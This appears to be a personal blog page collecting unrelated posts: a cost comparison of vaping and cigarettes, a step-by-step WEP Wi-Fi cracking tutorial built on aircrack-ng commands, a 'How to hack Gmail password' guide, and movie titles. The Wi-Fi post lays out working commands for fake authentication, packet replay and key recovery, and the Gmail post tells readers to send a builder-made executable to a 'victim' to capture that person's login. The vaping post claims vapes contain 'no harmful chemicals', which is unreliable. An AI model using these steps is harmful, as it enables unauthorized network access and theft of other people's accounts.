Your Ad Here

Wednesday 27 September 2023

Correct way of smoking

Usually a cigarette lasts 5 mins and if a person smokes a puff every 10 seconds they would get 300 seconds divided by 10 seconds you get 30 puffs per cigarette. 

Now lets say you smoked 165 cigarettes for 4950 puffs approx 5000. This costed you assuming price of one cig is rs 10 to 20, total of 165 multiplied by 10 to 165X20 i.e Rs1650 to 3300 further i.e Rs0.3 to 0.67 per puff. 

As alternative premium quality 5000 nicotine puffs cost you 1500rs i.e Rs 0.3 per puff.

Advantages: 

- No Smell

- Smoke Anywhere

- No harmful chemicals 

Disadvantages:

- You smoke more puffs compared to cig in a day due to the ease. If you were smoking 5 cig per day i.e 150 puffs, then now you might be taking 300 to 500.

Concluded: Premium quality vape in a controlled manner is better. 

Monday 23 July 2012

.:: CRACK WIFI ::.

wifi 300x189 CRACK WIFI   Simple WEP Crack

Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel


airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection


aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection

-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs


airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point


In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication

0 reassociation timing in seconds

-e infosec is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

-h 00:0F:B5:88:AC:82 is our card MAC address

OR

aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

2 – Reauthenticate every 2 seconds.

-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.

-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips


Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done! 

.:: HOW TO HACK GMAIL PASSWORD ::.


THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

This is a very awesome app and a great trick to hack someone’s gmail account – Gmail Hacker.!
This Gmail hacker is one of my favorite software to hack Gmail password. The only thing you have to do is to build your own Gmail Hacker and send this Gmail hacker to the victim. I’ve provided the link below for the download:


gmail logo stylized 300x300 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]

Gmail Hacker – Software to hack Gmail password :

1. First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework
2. Click HERE to download Gmail Hacker.
[ad code=1 align=center]
3. Download Winrar (free download here) to extract Gmail hacker folder.
4. Now, run Gmail Hacker Builder.exe file on your computer to see :
4115378636 7a99b4ff35 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
5. Enter in your email address and password (** I RECOMMEND CREATING A FAKE ID AND ENTER THE DETAILS OF THAT FAKE ID ONLY** So that people should not have a fear of losing their real email IDs in a doubt about this application icon smile How To Hack Gmail Password Using Gmail Hacker [TUTORIAL] ) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.
6. Now, send this Gmail Hacker.exe file to victim  and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he wanna hack).
4115378760 a2e79f5773 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
7. As he enters the information and hits “Hack Them”, he will receive an error message as shown below:
4115386436 1acebf90b6 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
8. In return, you will receive an email in your email account like this:
4115378704 c7b005c3e8 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
9. You’re Done!! icon biggrin How To Hack Gmail Password Using Gmail Hacker [TUTORIAL] You got his Gmail ID n password!

Saturday 23 June 2012

Just for UNICORN DASH fans

Monday 20 February 2012

.::Yaar Anmulle 2011 Punjabi Movie::.

.::Laddaland 2011 Hollywood Movie::.

.::Sumpahan puaka 2011 Hollywood Movie::.